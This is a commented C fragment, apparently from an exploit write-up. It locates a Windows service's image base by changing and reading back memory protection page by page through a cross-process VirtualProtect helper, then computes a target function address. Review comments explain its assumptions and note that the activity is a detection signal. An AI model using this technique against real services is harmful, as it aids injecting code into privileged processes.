// Fragment, not a compilable unit: pid, Page, Page_cp, OldProtection, Base,
// FuncOffset, pFunc and CommunicateServiceVirtualProtect are declared elsewhere,
// and the right-hand side of the first assignment is a placeholder comment.
pid = /*Locate the service's pid with the help of NtQuerySystemInformation*/;
// Walks the target's address space one 0x1000-byte page at a time, probing each
// page by changing its protection and reading back the previous value.
// Assumes a 4 KiB page size and a 2 GB user range (0x7fffffff), i.e. a 32-bit
// target; the bound would not cover a 64-bit process.
// NOTE(review): this is on the order of 0x7ffff protection-change requests
// against another process; from a defender's side that burst of cross-process
// VirtualProtect activity on a service is a strong detection signal.
for( Page = 0x1000; Page < 0x7fffffff; Page += 0x1000 )
{
// Page_cp keeps the probed address so the restore below still targets the
// right page after Page is overwritten in the PAGE_EXECUTE_READ branch.
Page_cp = Page;
OldProtection = CommunicateServiceVirtualProtect(
pid, //We give the service its own pid
Page, //Address of the page in the service's process
PAGE_EXECUTE_READWRITE, //Change to the most permissible protection to avoid crashes
0x1000
);
// Relies on the helper reporting an unmapped/invalid page as -1 — presumably a
// convention of CommunicateServiceVirtualProtect, not shown here; verify.
if ( OldProtection == -1 ) //Invalid page
continue;
if ( OldProtection == PAGE_EXECUTE_READ )
{
//this is the main module's .text section
// Heuristic: assumes the first PAGE_EXECUTE_READ page found in the scan is the
// main module's first .text page and that the image base lies exactly one page
// below it — TODO confirm for the target build; an earlier executable page
// (another module) would yield a wrong Base.
Base = Page - 0x1000;
Page = 0x7fffefff; //to break after restoring the old protection
// 0x7fffefff + 0x1000 == 0x7fffffff, so the loop condition fails on the next
// check; the restore below still runs for this iteration via Page_cp.
}
//restore the old protection
// Executed on every iteration that got past the -1 check, including the final
// one, so the probed page is returned to the protection that was read back.
CommunicateServiceVirtualProtect(
pid,
Page_cp,
OldProtection,
0x1000
);
}
//Use the base to calculate the function address
// Assumes FuncOffset is an offset relative to the image base computed above.
pFunc = Base + FuncOffset;
//....